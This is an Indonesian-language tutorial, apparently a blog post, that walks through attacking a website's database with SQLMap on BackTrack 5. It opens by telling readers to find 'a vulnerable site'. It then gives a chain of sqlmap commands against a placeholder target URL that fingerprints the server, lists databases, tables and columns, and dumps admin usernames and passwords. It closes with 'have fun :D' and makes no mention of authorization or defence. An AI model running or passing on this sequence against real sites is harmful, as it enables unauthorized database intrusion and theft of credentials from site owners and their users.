SQLMap Injection
Kali ini saya membuat tutorial tentang SQL Injection menggunakan tool SQLMap di BackTrack 5. Apa itu SQLMap ?

    sqlmap adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.

Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

Langkah - langkah yang harus dilakukan adalah sebagai berikut :

1. Pertama yang harus dipersiapkan adalah situs yang vulnerable.
2. Masuk ke direktori sqlmap

    cd /pentest/database/sqlmap

3. Lalu jalankan perintah berikut

    ./sqlmap.py -u http://site_target.com/indeks.html?staff_id=8 --random-agent --thread 10 --banner

    Hal yang dilakukan diatas adalah untuk mencari celah melalui banner yang ada dalam situs tersebut.

4. Selanjutnya mencari database dan pengguna terakhir dari web tersebut

    ./sqlmap.py -u http://site-target.com/indeks.html?staff_id=8 --random-agent --thread 10 --current-user --current-db

    contohnya akan tampil seperti ini :
    [*] mm_mm >> database dari situs tersebut
    [*] mm_mmadmin@localhost >> admin situs tersebut

5. Lakukan injeksi pada database

    ./sqlmap.py -u http://site_target.com/indeks.html?staff_id=8 --random-agent --thread 10 --dbs

6. Setelah nama database di dapatkan masukkan perintah berikut untuk melihat isi tables pada database

    ./sqlmap.py -u http://site_target.com/indeks.html?staff_id=8 --random-agent --thread 10 -D nama_database --tables

7. Cari columns dari tables database tersebut.

    ./sqlmap.py -u http://site_terget.com/indeks.html?staff_id=8 --random-agent --thread 10 -D nama_database --columns

8.  Columns didapat, masuk ke column untuk mencari username dan password admin

    ./sqlmap.py -u http://site_target.com/indeks.html?staff_id=8 --random-agent --thread 10 -D nama_database -C nama_columns --dump

9. Selamat bersenang - senang :D

By :   ./ RS-404